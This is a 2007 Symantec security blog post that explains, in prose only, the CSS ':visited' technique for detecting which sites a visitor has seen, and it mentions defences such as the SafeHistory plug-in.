Video Screencast Help
Security Response

Revealing Web History Without JavaScript

Created: 06 Apr 2007 07:00:00 GMT • Updated: 23 Jan 2014 18:50:34 GMT
Symantec Security Response's picture
0 0 Votes
Login to vote

In 2006, Web security expert Jeremiah Grossman came up with aninteresting attack that can be used to read the history of visitors toa Web page using only a simple piece of JavaScript. In February 2007,RSnake came up with a modification of this attack that does not needJavaScript or any other scripting language. This is a rediscovery of an attack discovered by Andrew Clover in 2002.

In the original proof of concept, a Web site was set up with ascript that lists the sites that the user had visited. This was donewas by creating a set of links and looking up the color attribute ofthe link text. If the link was visited, it was rendered in a differentcolor than if the page was not visited. The script goes through each ofthe links, checks the colors and reports back to the owner of the site.

In the new version of this attack, Cascading Style Sheets (CSS) areused to achieve the same result without using JavaScript. This can bedone by using the ‘a:visited’ component in CSS to create conditionallogic. The nature of CSS allows different behaviors to be activated forlinks depending on whether they have been visited. Traditionally, thiswas used for changing the color of link text if the link had beenpreviously visited. The powerful nature of CSS to customize these sortsof attributes can be used to activate further content if the link is inthe viewer’s history. In the proof of concept for this attack, everylink of a page is set up so that if it is visited, a background imagepointing to a CGI Script is loaded. This script informs the attacker ofthe IP address of the visitor and that the link is in the visitor’shistory.

This attack is not equivalent to being able to steal a user’s entirehistory. In this case, the attacker only has the ability to querywhether the user has seen a specific site. This attack could be used bycompanies trying to profile the interests of visitors for targetedadvertising, merchants checking to see which competitors a visitor totheir site has visited, or for other more devious information-gatheringtasks. This sort of attack could be used by phishers to identify whichbanks a user frequents and use that information to send targetedphishing attacks.

This interesting type of breach in privacy results from thebrowser’s ability to access its own history and use that information tomodify the pages displayed. CSS is a powerful tool for Web design, butsince it can be used to create conditional logic based on automaticinput from the browser, it can also lead to this type of attack. Oneway to prevent this attack is to use the Firefox plug-in SafeHistory.The paper Protecting browser state from web privacy attacks by Jackson et al. discusses further ramifications of this CSS design decision and possible ways to protect against it.